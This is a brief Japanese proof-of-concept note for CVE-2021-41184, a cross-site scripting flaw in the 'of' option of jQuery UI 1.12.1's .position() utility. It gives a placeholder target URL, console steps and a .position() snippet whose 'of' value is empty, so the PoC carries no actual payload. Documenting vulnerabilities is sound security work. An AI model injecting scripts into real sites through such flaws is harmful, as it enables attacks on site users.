
CVE-2021-41184の概念実証エクスプロイト。jQuery UIの.position()ユーティリティにおけるクロスサイトスクリプティング(XSS)脆弱性で、バージョン1.12.1を対象としています。
Exploit Medium CVE-2021-41184 .position()ユーティリティのofオプションにおけるXSS
1.1 https://www.website.com/_js/jquery/jquery-ui-1.12.1/jquery-ui.min.js
------------------------------------------------概念実証---------------------------------------------------------------
URLを開く
インスペクタを開く
サイト要素内のIDを探す
3.1 #ID
コンソールタブに移動する
手順3.1で選択したIDでスクリプトを注入する
5.1 スクリプト
$("#id").position( {
my: "center",
at: "right bottom",
of: "",
collision: "none"
});